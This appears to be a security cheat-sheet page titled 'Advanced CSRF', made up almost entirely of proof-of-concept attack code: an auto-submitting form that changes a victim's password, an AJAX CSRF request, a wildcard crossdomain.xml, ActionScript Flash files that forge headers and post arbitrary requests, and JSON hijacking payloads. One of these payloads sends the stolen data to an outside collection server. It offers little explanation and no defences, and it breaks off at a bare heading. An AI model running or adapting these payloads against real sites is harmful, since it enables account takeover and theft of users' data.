Advanced CSRF

example CSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://taget.com/modify" method="POST">
<input type="hidden" name="username" value="xl7dev" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

AJAX CSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function csrfAjax(){
if (window.XMLHttpRequest){
xmlhttp=new XMLHttpRequest();
} else{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4 && xmlhttp.status==200){
document.getElementById("myDiv").innerHTML=xmlhttp.responseText; }
}
xmlhttp.open("POST","http://target.com/csrf.php",true);
xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xmlhttp.send("query=123hacked123&primary Type=mixed&sortBy=date&intl=true");
}

Bypass Header via Flash

crossdomain.xml

1
2
3
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

flashcsrfexp.as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
class forge_headers{
function forge_headers(){

}
static function main(mc){
var req:LoadVars=new LoadVars();
// GET method
//req.addRequestHeader("Foo","Bar");
//req.addRequestHeader("Host:","www.target.com");
//req.send("http://www.target.com/csrf.php?p1=v1&p2=v2","","GET");
//req.send("http://www.target.com/csrf.php","","GET")
// POST method
req.addRequestHeader("Bar","BarFoo");
req.addRequestHeader("Referer:http://www.target.com/csrf.php","")
req.addRequestHeader("Host:","www.target.com");
req.decode("username=xl7dev&password=pass");
req.send("http://www.target.com/csrf.php","","POST")
}
}

Usage:url=[post请求的地址]&[参数值用&分开]

FlashCSRFexp.swf?url=http://www.xx.xx/x.jsp?&xx=xx&xx=xx&xx=xx&xx=xx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
package
{
import flash.display.Sprite;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;
import flash.net.sendToURL;

public class FlashCSRFexp extends Sprite
{

public function FlashCSRFexp()
{
var key:* = null;
var emailtargetURL:String = null;
var emailrequest:URLRequest = null;
var datastring:String = null;
super();
var postdata:Object = this.loaderInfo.parameters;
var data:Array = [];
for(key in postdata)
{
if(key != "url")
{
data.push(key + "=" + postdata[key]);
}
}
emailtargetURL = postdata.url;
emailrequest = new URLRequest(emailtargetURL);
emailrequest.method = URLRequestMethod.POST;
datastring = data.join("&");
emailrequest.data = datastring;
sendToURL(emailrequest);
}
}
}

JSON HiJacking

1
2
3
4
5
6
7
8
9
10
11
12
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> 
<script type="text/javascript">
function jsonpCallback(result) {
alert(result.a);
alert(result.b);
alert(result.c);
for(var i in result) {
alert(i+":"+result[i]);//循环输出a:1,b:2,etc.
}
}
</script>
<script type="text/javascript" src="http://www.target.com/json.php?callback=jsonpCallback"></script>

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<script type="text/javascript">
function hijack(result) {
var data = '';
for(var i in result) {
data += i + ':' + result[i];
}
new Image().src = "http://blog.safebuff.com/JSONHiJacking.php?data=" + escape(data);//把数据发送到攻击者服务器上
}
</script>
<script type="text/javascript" src="http://www.target.com/services.php?callback=hijack"></script>
</html>

CSRF via XSS

CSRF via XSS